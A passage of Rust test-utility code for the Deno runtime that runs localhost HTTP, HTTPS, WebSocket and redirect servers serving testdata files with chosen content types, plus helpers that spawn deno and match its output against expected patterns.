HeaderValue::from_static("./xTypeScriptTypes.d.ts"),
);
Ok(res)
}
(_, "/xTypeScriptTypes.d.ts") => {
let mut res = Response::new(Body::from("export const foo: 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/type_directives_redirect.js") => {
let mut res = Response::new(Body::from("export const foo = 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static(
"http://localhost:4547/xTypeScriptTypesRedirect.d.ts",
),
);
Ok(res)
}
(_, "/type_headers_deno_types.foo.js") => {
let mut res = Response::new(Body::from(
"export function foo(text) { console.log(text); }",
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
res.headers_mut().insert(
"X-TypeScript-Types",
HeaderValue::from_static(
"http://localhost:4545/type_headers_deno_types.d.ts",
),
);
Ok(res)
}
(_, "/type_headers_deno_types.d.ts") => {
let mut res =
Response::new(Body::from("export function foo(text: number): void;"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/type_headers_deno_types.foo.d.ts") => {
let mut res =
Response::new(Body::from("export function foo(text: string): void;"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/subdir/xTypeScriptTypesRedirect.d.ts") => {
let mut res = Response::new(Body::from(
"import './xTypeScriptTypesRedirected.d.ts';",
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/subdir/xTypeScriptTypesRedirected.d.ts") => {
let mut res = Response::new(Body::from("export const foo: 'foo';"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/referenceTypes.js") => {
let mut res = Response::new(Body::from("/// <reference types=\"./xTypeScriptTypes.d.ts\" />\r\nexport const foo = \"foo\";\r\n"));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
Ok(res)
}
(_, "/subdir/file_with_:_in_name.ts") => {
let mut res = Response::new(Body::from(
"console.log('Hello from file_with_:_in_name.ts');",
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/typescript"),
);
Ok(res)
}
(_, "/subdir/[email protected]") => {
let mut res = Response::new(Body::from(
r#"import { printHello } from "./mod2.ts";
printHello();
"#,
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
Ok(res)
}
(_, "/.well-known/deno-import-intellisense.json") => {
let file_path =
testdata_path().join("lsp/registries/deno-import-intellisense.json");
if let Ok(body) = tokio::fs::read(file_path).await {
Ok(custom_headers(
"/.well-known/deno-import-intellisense.json",
body,
))
} else {
Ok(Response::new(Body::empty()))
}
}
(_, "/http_version") => {
let version = format!("{:?}", req.version());
Ok(Response::new(version.into()))
}
(_, "/content_length") => {
let content_length = format!("{:?}", req.headers().get("content-length"));
Ok(Response::new(content_length.into()))
}
(_, "/jsx/jsx-runtime") | (_, "/jsx/jsx-dev-runtime") => {
let mut res = Response::new(Body::from(
r#"export function jsx(
_type,
_props,
_key,
_source,
_self,
) {}
export const jsxs = jsx;
export const jsxDEV = jsx;
export const Fragment = Symbol("Fragment");
console.log("imported", import.meta.url);
"#,
));
res.headers_mut().insert(
"Content-type",
HeaderValue::from_static("application/javascript"),
);
Ok(res)
}
(_, "/dynamic") => {
let mut res = Response::new(Body::from(
serde_json::to_string_pretty(&std::time::SystemTime::now()).unwrap(),
));
res
.headers_mut()
.insert("cache-control", HeaderValue::from_static("no-cache"));
Ok(res)
}
(_, "/dynamic_cache") => {
let mut res = Response::new(Body::from(
serde_json::to_string_pretty(&std::time::SystemTime::now()).unwrap(),
));
res.headers_mut().insert(
"cache-control",
HeaderValue::from_static("public, max-age=604800, immutable"),
);
Ok(res)
}
(_, "/echo_accept") => {
let accept = req.headers().get("accept").map(|v| v.to_str().unwrap());
let res = Response::new(Body::from(
serde_json::json!({ "accept": accept }).to_string(),
));
Ok(res)
}
_ => {
let mut file_path = testdata_path();
file_path.push(&req.uri().path()[1..]);
if let Ok(file) = tokio::fs::read(file_path).await {
let file_resp = custom_headers(req.uri().path(), file);
return Ok(file_resp);
}
Response::builder()
.status(StatusCode::NOT_FOUND)
.body(Body::empty())
}
};
}
/// Taken from example in https://github.com/ctz/hyper-rustls/blob/a02ef72a227dcdf102f86e905baa7415c992e8b3/examples/server.rs
struct HyperAcceptor<'a> {
acceptor: Pin<
Box<
dyn Stream<Item = io::Result<tokio_rustls::server::TlsStream<TcpStream>>>
+ 'a,
>,
>,
}
impl hyper::server::accept::Accept for HyperAcceptor<'_> {
type Conn = tokio_rustls::server::TlsStream<TcpStream>;
type Error = io::Error;
fn poll_accept(
mut self: Pin<&mut Self>,
cx: &mut Context,
) -> Poll<Option<Result<Self::Conn, Self::Error>>> {
Pin::new(&mut self.acceptor).poll_next(cx)
}
}
unsafe impl std::marker::Send for HyperAcceptor<'_> {}
async fn wrap_redirect_server() {
let redirect_svc =
make_service_fn(|_| async { Ok::<_, Infallible>(service_fn(redirect)) });
let redirect_addr = SocketAddr::from(([127, 0, 0, 1], REDIRECT_PORT));
let redirect_server = Server::bind(&redirect_addr).serve(redirect_svc);
if let Err(e) = redirect_server.await {
eprintln!("Redirect error: {:?}", e);
}
}
async fn wrap_double_redirect_server() {
let double_redirects_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(double_redirects))
});
let double_redirects_addr =
SocketAddr::from(([127, 0, 0, 1], DOUBLE_REDIRECTS_PORT));
let double_redirects_server =
Server::bind(&double_redirects_addr).serve(double_redirects_svc);
if let Err(e) = double_redirects_server.await {
eprintln!("Double redirect error: {:?}", e);
}
}
async fn wrap_inf_redirect_server() {
let inf_redirects_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(inf_redirects))
});
let inf_redirects_addr =
SocketAddr::from(([127, 0, 0, 1], INF_REDIRECTS_PORT));
let inf_redirects_server =
Server::bind(&inf_redirects_addr).serve(inf_redirects_svc);
if let Err(e) = inf_redirects_server.await {
eprintln!("Inf redirect error: {:?}", e);
}
}
async fn wrap_another_redirect_server() {
let another_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(another_redirect))
});
let another_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], ANOTHER_REDIRECT_PORT));
let another_redirect_server =
Server::bind(&another_redirect_addr).serve(another_redirect_svc);
if let Err(e) = another_redirect_server.await {
eprintln!("Another redirect error: {:?}", e);
}
}
async fn wrap_auth_redirect_server() {
let auth_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(auth_redirect))
});
let auth_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], AUTH_REDIRECT_PORT));
let auth_redirect_server =
Server::bind(&auth_redirect_addr).serve(auth_redirect_svc);
if let Err(e) = auth_redirect_server.await {
eprintln!("Auth redirect error: {:?}", e);
}
}
async fn wrap_basic_auth_redirect_server() {
let basic_auth_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(basic_auth_redirect))
});
let basic_auth_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], BASIC_AUTH_REDIRECT_PORT));
let basic_auth_redirect_server =
Server::bind(&basic_auth_redirect_addr).serve(basic_auth_redirect_svc);
if let Err(e) = basic_auth_redirect_server.await {
eprintln!("Basic auth redirect error: {:?}", e);
}
}
async fn wrap_abs_redirect_server() {
let abs_redirect_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(absolute_redirect))
});
let abs_redirect_addr =
SocketAddr::from(([127, 0, 0, 1], REDIRECT_ABSOLUTE_PORT));
let abs_redirect_server =
Server::bind(&abs_redirect_addr).serve(abs_redirect_svc);
if let Err(e) = abs_redirect_server.await {
eprintln!("Absolute redirect error: {:?}", e);
}
}
async fn wrap_main_server() {
let main_server_svc =
make_service_fn(|_| async { Ok::<_, Infallible>(service_fn(main_server)) });
let main_server_addr = SocketAddr::from(([127, 0, 0, 1], PORT));
let main_server = Server::bind(&main_server_addr).serve(main_server_svc);
if let Err(e) = main_server.await {
eprintln!("HTTP server error: {:?}", e);
}
}
async fn wrap_main_https_server() {
let main_server_https_addr = SocketAddr::from(([127, 0, 0, 1], HTTPS_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https"); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve clients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
let stream = tls_acceptor.accept(socket);
yield stream.await;
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.serve(main_server_https_svc);
// Continue to prevent a TLS error from stopping the server.
if main_server_https.await.is_err() {
continue;
}
}
}
async fn wrap_https_h1_only_server() {
let main_server_https_addr = SocketAddr::from(([127, 0, 0, 1], H1_ONLY_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config = get_tls_config(
cert_file,
key_file,
ca_cert_file,
SupportedHttpVersions::Http1Only,
)
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https"); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve clients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
let stream = tls_acceptor.accept(socket);
yield stream.await;
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.http1_only(true)
.serve(main_server_https_svc);
// Continue to prevent a TLS error from stopping the server.
if main_server_https.await.is_err() {
continue;
}
}
}
async fn wrap_https_h2_only_server() {
let main_server_https_addr = SocketAddr::from(([127, 0, 0, 1], H2_ONLY_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config = get_tls_config(
cert_file,
key_file,
ca_cert_file,
SupportedHttpVersions::Http2Only,
)
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https"); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve clients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
let stream = tls_acceptor.accept(socket);
yield stream.await;
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.http2_only(true)
.serve(main_server_https_svc);
// Continue to prevent a TLS error from stopping the server.
if main_server_https.await.is_err() {
continue;
}
}
}
async fn wrap_client_auth_https_server() {
let main_server_https_addr =
SocketAddr::from(([127, 0, 0, 1], HTTPS_CLIENT_AUTH_PORT));
let cert_file = "tls/localhost.crt";
let key_file = "tls/localhost.key";
let ca_cert_file = "tls/RootCA.pem";
let tls_config =
get_tls_config(cert_file, key_file, ca_cert_file, Default::default())
.await
.unwrap();
loop {
let tcp = TcpListener::bind(&main_server_https_addr)
.await
.expect("Cannot bind TCP");
println!("ready: https_client_auth on :{:?}", HTTPS_CLIENT_AUTH_PORT); // Eye catcher for HttpServerCount
let tls_acceptor = TlsAcceptor::from(tls_config.clone());
// Prepare a long-running future stream to accept and serve clients.
let incoming_tls_stream = async_stream::stream! {
loop {
let (socket, _) = tcp.accept().await?;
match tls_acceptor.accept(socket).await {
Ok(mut tls_stream) => {
let (_, tls_session) = tls_stream.get_mut();
// We only need to check for the presence of client certificates
// here. Rustls ensures that they are valid and signed by the CA.
match tls_session.peer_certificates() {
Some(_certs) => { yield Ok(tls_stream); },
None => { eprintln!("https_client_auth: no valid client certificate"); },
};
}
Err(e) => {
eprintln!("https-client-auth accept error: {:?}", e);
yield Err(e);
}
}
}
}
.boxed();
let main_server_https_svc = make_service_fn(|_| async {
Ok::<_, Infallible>(service_fn(main_server))
});
let main_server_https = Server::builder(HyperAcceptor {
acceptor: incoming_tls_stream,
})
.serve(main_server_https_svc);
// Continue to prevent a TLS error from stopping the server.
if main_server_https.await.is_err() {
continue;
}
}
}
// Use the single-threaded scheduler. The hyper server is used as a point of
// comparison for the (single-threaded!) benchmarks in cli/bench. We're not
// comparing apples to apples if we use the default multi-threaded scheduler.
#[tokio::main(flavor = "current_thread")]
pub async fn run_all_servers() {
if let Some(port) = env::args().nth(1) {
return hyper_hello(port.parse::<u16>().unwrap()).await;
}
let redirect_server_fut = wrap_redirect_server();
let double_redirects_server_fut = wrap_double_redirect_server();
let inf_redirects_server_fut = wrap_inf_redirect_server();
let another_redirect_server_fut = wrap_another_redirect_server();
let auth_redirect_server_fut = wrap_auth_redirect_server();
let basic_auth_redirect_server_fut = wrap_basic_auth_redirect_server();
let abs_redirect_server_fut = wrap_abs_redirect_server();
let ws_addr = SocketAddr::from(([127, 0, 0, 1], WS_PORT));
let ws_server_fut = run_ws_server(&ws_addr);
let wss_addr = SocketAddr::from(([127, 0, 0, 1], WSS_PORT));
let wss_server_fut = run_wss_server(&wss_addr);
let ws_close_addr = SocketAddr::from(([127, 0, 0, 1], WS_CLOSE_PORT));
let ws_close_server_fut = run_ws_close_server(&ws_close_addr);
let tls_server_fut = run_tls_server();
let tls_client_auth_server_fut = run_tls_client_auth_server();
let client_auth_server_https_fut = wrap_client_auth_https_server();
let main_server_fut = wrap_main_server();
let main_server_https_fut = wrap_main_https_server();
let h1_only_server_fut = wrap_https_h1_only_server();
let h2_only_server_fut = wrap_https_h2_only_server();
let mut server_fut = async {
futures::join!(
redirect_server_fut,
ws_server_fut,
wss_server_fut,
tls_server_fut,
tls_client_auth_server_fut,
ws_close_server_fut,
another_redirect_server_fut,
auth_redirect_server_fut,
basic_auth_redirect_server_fut,
inf_redirects_server_fut,
double_redirects_server_fut,
abs_redirect_server_fut,
main_server_fut,
main_server_https_fut,
client_auth_server_https_fut,
h1_only_server_fut,
h2_only_server_fut
)
}
.boxed();
let mut did_print_ready = false;
futures::future::poll_fn(move |cx| {
let poll_result = server_fut.poll_unpin(cx);
if !replace(&mut did_print_ready, true) {
println!("ready: server_fut"); // Eye catcher for HttpServerCount
}
poll_result
})
.await;
}
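/// Chooses response headers (content type, encoding, etc.) for a testdata
/// file based on patterns in the requested path.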
fn custom_headers(p: &str, body: Vec<u8>) -> Response<Body> {
let mut response = Response::new(Body::from(body));
if p.ends_with("/x_deno_warning.js") {
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_static("application/javascript"),
);
response
.headers_mut()
.insert("X-Deno-Warning", HeaderValue::from_static("foobar"));
return response;
}
if p.ends_with("/053_import_compression/brotli") {
response
.headers_mut()
.insert("Content-Encoding", HeaderValue::from_static("br"));
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_static("application/javascript"),
);
response
.headers_mut()
.insert("Content-Length", HeaderValue::from_static("26"));
return response;
}
if p.ends_with("/053_import_compression/gziped") {
response
.headers_mut()
.insert("Content-Encoding", HeaderValue::from_static("gzip"));
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_static("application/javascript"),
);
response
.headers_mut()
.insert("Content-Length", HeaderValue::from_static("39"));
return response;
}
if p.contains("/encoding/") {
let charset = p
.split_terminator('/')
.last()
.unwrap()
.trim_end_matches(".ts");
response.headers_mut().insert(
"Content-Type",
HeaderValue::from_str(
&format!("application/typescript;charset={}", charset)[..],
)
.unwrap(),
);
return response;
}
let content_type = if p.contains(".t1.") {
Some("text/typescript")
} else if p.contains(".t2.") {
Some("video/vnd.dlna.mpeg-tts")
} else if p.contains(".t3.") {
Some("video/mp2t")
} else if p.contains(".t4.") {
Some("application/x-typescript")
} else if p.contains(".j1.") {
Some("text/javascript")
} else if p.contains(".j2.") {
Some("application/ecmascript")
} else if p.contains(".j3.") {
Some("text/ecmascript")
} else if p.contains(".j4.") {
Some("application/x-javascript")
} else if p.contains("form_urlencoded") {
Some("application/x-www-form-urlencoded")
} else if p.contains("unknown_ext") || p.contains("no_ext") {
Some("text/typescript")
} else if p.contains("mismatch_ext") || p.contains("no_js_ext") {
Some("text/javascript")
} else if p.ends_with(".ts") || p.ends_with(".tsx") {
Some("application/typescript")
} else if p.ends_with(".js") || p.ends_with(".jsx") {
Some("application/javascript")
} else if p.ends_with(".json") {
Some("application/json")
} else if p.ends_with(".wasm") {
Some("application/wasm")
} else {
None
};
if let Some(t) = content_type {
response
.headers_mut()
.insert("Content-Type", HeaderValue::from_str(t).unwrap());
return response;
}
response
}
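/// Reference count for the shared test_server subprocess: the server is
/// spawned on the first `inc()` and killed when the count returns to zero.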
#[derive(Default)]
struct HttpServerCount {
count: usize,
test_server: Option<Child>,
}
impl HttpServerCount {
fn inc(&mut self) {
self.count += 1;
if self.test_server.is_none() {
assert_eq!(self.count, 1);
println!("test_server starting...");
let mut test_server = Command::new(test_server_path())
.current_dir(testdata_path())
.stdout(Stdio::piped())
.spawn()
.expect("failed to execute test_server");
let stdout = test_server.stdout.as_mut().unwrap();
use std::io::{BufRead, BufReader};
let lines = BufReader::new(stdout).lines();
// Wait for all the servers to report being ready.
let mut ready_count = 0;
for maybe_line in lines {
if let Ok(line) = maybe_line {
if line.starts_with("ready:") {
ready_count += 1;
}
if ready_count == 6 {
break;
}
} else {
panic!("{}", maybe_line.unwrap_err());
}
}
self.test_server = Some(test_server);
}
}
fn dec(&mut self) {
assert!(self.count > 0);
self.count -= 1;
if self.count == 0 {
let mut test_server = self.test_server.take().unwrap();
match test_server.try_wait() {
Ok(None) => {
test_server.kill().expect("failed to kill test_server");
let _ = test_server.wait();
}
Ok(Some(status)) => {
panic!("test_server exited unexpectedly {}", status)
}
Err(e) => panic!("test_server error: {}", e),
}
}
}
}
impl Drop for HttpServerCount {
fn drop(&mut self) {
assert_eq!(self.count, 0);
assert!(self.test_server.is_none());
}
}
fn lock_http_server<'a>() -> MutexGuard<'a, HttpServerCount> {
let r = GUARD.lock();
if let Err(poison_err) = r {
// If panics happened, ignore it. This is for tests.
poison_err.into_inner()
} else {
r.unwrap()
}
}
pub struct HttpServerGuard {}
impl Drop for HttpServerGuard {
fn drop(&mut self) {
let mut g = lock_http_server();
g.dec();
}
}
/// Adds a reference to a shared target/debug/test_server subprocess. When the
/// last instance of the HttpServerGuard is dropped, the subprocess will be
/// killed.
pub fn http_server() -> HttpServerGuard {
ensure_test_server_built();
let mut g = lock_http_server();
g.inc();
HttpServerGuard {}
}
/// Helper function to strip ansi codes.
pub fn strip_ansi_codes(s: &str) -> std::borrow::Cow<str> {
STRIP_ANSI_RE.replace_all(s, "")
}
pub fn run(
cmd: &[&str],
input: Option<&[&str]>,
envs: Option<Vec<(String, String)>>,
current_dir: Option<&str>,
expect_success: bool,
) {
let mut process_builder = Command::new(cmd[0]);
process_builder.args(&cmd[1..]).stdin(Stdio::piped());
if let Some(dir) = current_dir {
process_builder.current_dir(dir);
}
if let Some(envs) = envs {
process_builder.envs(envs);
}
let mut prog = process_builder.spawn().expect("failed to spawn script");
if let Some(lines) = input {
let stdin = prog.stdin.as_mut().expect("failed to get stdin");
stdin
.write_all(lines.join("\n").as_bytes())
.expect("failed to write to stdin");
}
let status = prog.wait().expect("failed to wait on child");
if expect_success != status.success() {
panic!("Unexpected exit code: {:?}", status.code());
}
}
pub fn run_collect(
cmd: &[&str],
input: Option<&[&str]>,
envs: Option<Vec<(String, String)>>,
current_dir: Option<&str>,
expect_success: bool,
) -> (String, String) {
let mut process_builder = Command::new(cmd[0]);
process_builder
.args(&cmd[1..])
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped());
if let Some(dir) = current_dir {
process_builder.current_dir(dir);
}
if let Some(envs) = envs {
process_builder.envs(envs);
}
let mut prog = process_builder.spawn().expect("failed to spawn script");
if let Some(lines) = input {
let stdin = prog.stdin.as_mut().expect("failed to get stdin");
stdin
.write_all(lines.join("\n").as_bytes())
.expect("failed to write to stdin");
}
let Output {
stdout,
stderr,
status,
} = prog.wait_with_output().expect("failed to wait on child");
let stdout = String::from_utf8(stdout).unwrap();
let stderr = String::from_utf8(stderr).unwrap();
if expect_success != status.success() {
eprintln!("stdout: <<<{}>>>", stdout);
eprintln!("stderr: <<<{}>>>", stderr);
panic!("Unexpected exit code: {:?}", status.code());
}
(stdout, stderr)
}
pub fn run_and_collect_output(
expect_success: bool,
args: &str,
input: Option<Vec<&str>>,
envs: Option<Vec<(String, String)>>,
need_http_server: bool,
) -> (String, String) {
run_and_collect_output_with_args(
expect_success,
args.split_whitespace().collect(),
input,
envs,
need_http_server,
)
}
pub fn run_and_collect_output_with_args(
expect_success: bool,
args: Vec<&str>,
input: Option<Vec<&str>>,
envs: Option<Vec<(String, String)>>,
need_http_server: bool,
) -> (String, String) {
let mut deno_process_builder = deno_cmd();
deno_process_builder
.args(args)
.current_dir(&testdata_path())
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped());
if let Some(envs) = envs {
deno_process_builder.envs(envs);
}
let _http_guard = if need_http_server {
Some(http_server())
} else {
None
};
let mut deno = deno_process_builder
.spawn()
.expect("failed to spawn script");
if let Some(lines) = input {
let stdin = deno.stdin.as_mut().expect("failed to get stdin");
stdin
.write_all(lines.join("\n").as_bytes())
.expect("failed to write to stdin");
}
let Output {
stdout,
stderr,
status,
} = deno.wait_with_output().expect("failed to wait on child");
let stdout = String::from_utf8(stdout).unwrap();
let stderr = String::from_utf8(stderr).unwrap();
if expect_success != status.success() {
eprintln!("stdout: <<<{}>>>", stdout);
eprintln!("stderr: <<<{}>>>", stderr);
panic!("Unexpected exit code: {:?}", status.code());
}
(stdout, stderr)
}
pub fn new_deno_dir() -> TempDir {
TempDir::new().expect("tempdir fail")
}
pub fn deno_cmd() -> Command {
let deno_dir = new_deno_dir();
deno_cmd_with_deno_dir(deno_dir.path())
}
pub fn deno_cmd_with_deno_dir(deno_dir: &std::path::Path) -> Command {
let e = deno_exe_path();
assert!(e.exists());
let mut c = Command::new(e);
c.env("DENO_DIR", deno_dir);
c
}
pub fn run_powershell_script_file(
script_file_path: &str,
args: Vec<&str>,
) -> std::result::Result<(), i64> {
let deno_dir = new_deno_dir();
let mut command = Command::new("powershell.exe");
command
.env("DENO_DIR", deno_dir.path())
.current_dir(testdata_path())
.arg("-file")
.arg(script_file_path);
for arg in args {
command.arg(arg);
}
let output = command.output().expect("failed to spawn script");
let stdout = String::from_utf8(output.stdout).unwrap();
let stderr = String::from_utf8(output.stderr).unwrap();
println!("{}", stdout);
if !output.status.success() {
panic!(
"{} executed with failing error code\n{}{}",
script_file_path, stdout, stderr
);
}
Ok(())
}
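/// Declarative integration test: runs the deno binary with `args` and
/// compares the combined stdout/stderr against `output_str` or the testdata
/// file named by `output`, using [WILDCARD] pattern matching.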
#[derive(Debug, Default)]
pub struct CheckOutputIntegrationTest {
pub args: &'static str,
pub output: &'static str,
pub input: Option<&'static str>,
pub output_str: Option<&'static str>,
pub exit_code: i32,
pub http_server: bool,
pub envs: Vec<(String, String)>,
}
impl CheckOutputIntegrationTest {
pub fn run(&self) {
let args = self.args.split_whitespace();
let deno_exe = deno_exe_path();
println!("deno_exe path {}", deno_exe.display());
let _http_server_guard = if self.http_server {
Some(http_server())
} else {
None
};
let (mut reader, writer) = pipe().unwrap();
let testdata_dir = testdata_path();
let mut command = deno_cmd();
println!("deno_exe args {}", self.args);
println!("deno_exe testdata path {:?}", &testdata_dir);
command.args(args);
command.envs(self.envs.clone());
command.current_dir(&testdata_dir);
command.stdin(Stdio::piped());
let writer_clone = writer.try_clone().unwrap();
command.stderr(writer_clone);
command.stdout(writer);
let mut process = command.spawn().expect("failed to execute process");
if let Some(input) = self.input {
let mut p_stdin = process.stdin.take().unwrap();
write!(p_stdin, "{}", input).unwrap();
}
// Very important when using pipes: This parent process is still
// holding its copies of the write ends, and we have to close them
// before we read, otherwise the read end will never report EOF. The
// Command object owns the writers now, and dropping it closes them.
drop(command);
let mut actual = String::new();
reader.read_to_string(&mut actual).unwrap();
let status = process.wait().expect("failed to finish process");
if let Some(exit_code) = status.code() {
if self.exit_code != exit_code {
println!("OUTPUT\n{}\nOUTPUT", actual);
panic!(
"bad exit code, expected: {:?}, actual: {:?}",
self.exit_code, exit_code
);
}
} else {
#[cfg(unix)]
{
use std::os::unix::process::ExitStatusExt;
let signal = status.signal().unwrap();
println!("OUTPUT\n{}\nOUTPUT", actual);
panic!(
"process terminated by signal, expected exit code: {:?}, actual signal: {:?}",
self.exit_code, signal
);
}
#[cfg(not(unix))]
{
println!("OUTPUT\n{}\nOUTPUT", actual);
panic!("process terminated without status code on non unix platform, expected exit code: {:?}", self.exit_code);
}
}
actual = strip_ansi_codes(&actual).to_string();
let expected = if let Some(s) = self.output_str {
s.to_owned()
} else {
let output_path = testdata_dir.join(self.output);
println!("output path {}", output_path.display());
std::fs::read_to_string(output_path).expect("cannot read output")
};
if !wildcard_match(&expected, &actual) {
println!("OUTPUT\n{}\nOUTPUT", actual);
println!("EXPECTED\n{}\nEXPECTED", expected);
panic!("pattern match failed");
}
}
}
pub fn wildcard_match(pattern: &str, s: &str) -> bool {
pattern_match(pattern, s, "[WILDCARD]")
}
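/// Matches `s` against `pattern`, where each occurrence of `wildcard` in the
/// pattern matches an arbitrary (possibly empty) substring.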
pub fn pattern_match(pattern: &str, s: &str, wildcard: &str) -> bool {
// Normalize line endings
let mut s = s.replace("\r\n", "\n");
let pattern = pattern.replace("\r\n", "\n");
if pattern == wildcard {
return true;
}
let parts = pattern.split(wildcard).collect::<Vec<&str>>();
if parts.len() == 1 {
return pattern == s;
}
if !s.starts_with(parts[0]) {
return false;
}
// If the first line of the pattern is just a wildcard, the newline character
// needs to be prepended so it can safely match anything or nothing and
// continue matching.
if pattern.lines().next() == Some(wildcard) {
s.insert(0, '\n');
}
let mut t = s.split_at(parts[0].len());
for (i, part) in parts.iter().enumerate() {
if i == 0 {
continue;
}
dbg!(part, i);
if i == parts.len() - 1 && (part.is_empty() || *part == "\n") {
dbg!("exit 1 true", i);
return true;
}
if let Some(found) = t.1.find(*part) {
dbg!("found ", found);
t = t.1.split_at(found + part.len());
} else {
dbg!("exit false ", i);
return false;
}
}
dbg!("end ", t.1.len());
t.1.is_empty()
}
pub enum PtyData {
Input(&'static str),
Output(&'static str),
}
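/// Drives deno through a pseudo-terminal, writing each `Input` entry and
/// asserting that each `Output` entry appears, after normalizing terminal
/// escape sequences on both sides.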
pub fn test_pty2(args: &str, data: Vec<PtyData>) {
use std::io::BufRead;
with_pty(&args.split_whitespace().collect::<Vec<_>>(), |console| {
let mut buf_reader = std::io::BufReader::new(console);
for d in data.iter() {
match d {
PtyData::Input(s) => {
println!("INPUT {}", s.escape_debug());
buf_reader.get_mut().write_text(s);
// Because of tty echo, we should be able to read the same string back.
assert!(s.ends_with('\n'));
let mut echo = String::new();
buf_reader.read_line(&mut echo).unwrap();
println!("ECHO: {}", echo.escape_debug());
// Windows may also echo the previous line, so only check the end
assert!(normalize_text(&echo).ends_with(&normalize_text(s)));
}
PtyData::Output(s) => {
let mut line = String::new();
if s.ends_with('\n') {
buf_reader.read_line(&mut line).unwrap();
} else {
// assumes the buffer won't have overlapping virtual terminal sequences
while normalize_text(&line).len() < normalize_text(s).len() {
let mut buf = [0; 64 * 1024];
let bytes_read = buf_reader.read(&mut buf).unwrap();
assert!(bytes_read > 0);
let buf_str = std::str::from_utf8(&buf)
.unwrap()
.trim_end_matches(char::from(0));
line += buf_str;
}
}
println!("OUTPUT {}", line.escape_debug());
assert_eq!(normalize_text(&line), normalize_text(s));
}
}
}
});
// This normalization function is not comprehensive
// and may need to be updated as new scenarios emerge.
fn normalize_text(text: &str) -> String {
lazy_static! {
static ref MOVE_CURSOR_RIGHT_ONE_RE: Regex =
Regex::new(r"\x1b\[1C").unwrap();
static ref FOUND_SEQUENCES_RE: Regex =
Regex::new(r"(\x1b\]0;[^\x07]*\x07)*(\x08)*(\x1b\[\d+X)*").unwrap();
static ref CARRIAGE_RETURN_RE: Regex =
Regex::new(r"[^\n]*\r([^\n])").unwrap();
}
// any "move cursor right" sequences should just be a space
let text = MOVE_CURSOR_RIGHT_ONE_RE.replace_all(text, " ");
// replace additional virtual terminal sequences that strip ansi codes doesn't catch
let text = FOUND_SEQUENCES_RE.replace_all(&text, "");
// strip any ansi codes, which also strips more terminal sequences
let text = strip_ansi_codes(&text);
// get rid of any text that is overwritten with only a carriage return
let text = CARRIAGE_RETURN_RE.replace_all(&text, "$1");
// finally, trim surrounding whitespace
text.trim().to_string()
}
}
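/// Runs `action` against a deno subprocess attached to a pseudo-terminal.
/// Does nothing when stdin or stderr is not a tty (e.g. on CI machines
/// without a console).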
pub fn with_pty(deno_args: &[&str], mut action: impl FnMut(Box<dyn pty::Pty>)) {
if !atty::is(atty::Stream::Stdin) || !atty::is(atty::Stream::Stderr) {
eprintln!("Ignoring non-tty environment.");
return;
}
let deno_dir = new_deno_dir();
let mut env_vars = std::collections::HashMap::new();
env_vars.insert("NO_COLOR".to_string(), "1".to_string());
